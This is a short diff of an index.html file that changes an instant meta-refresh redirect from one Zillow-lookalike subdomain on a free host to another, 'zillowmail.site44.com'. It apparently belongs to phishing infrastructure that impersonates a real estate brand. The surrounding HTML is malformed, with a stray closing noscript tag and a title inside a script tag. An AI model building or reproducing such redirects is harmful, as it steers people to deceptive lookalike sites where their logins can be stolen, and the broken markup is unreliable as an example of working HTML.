--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en-US">
 <head>
     <meta charset="UTF-8">
-    <meta http-equiv="refresh" content="0;URL=http://zillowhomes365.site44.com">
+    <meta http-equiv="refresh" content="0;URL=http://zillowmail.site44.com">
 </noscript>
         <script language="javascript">
             <title>Redirecting...</title>
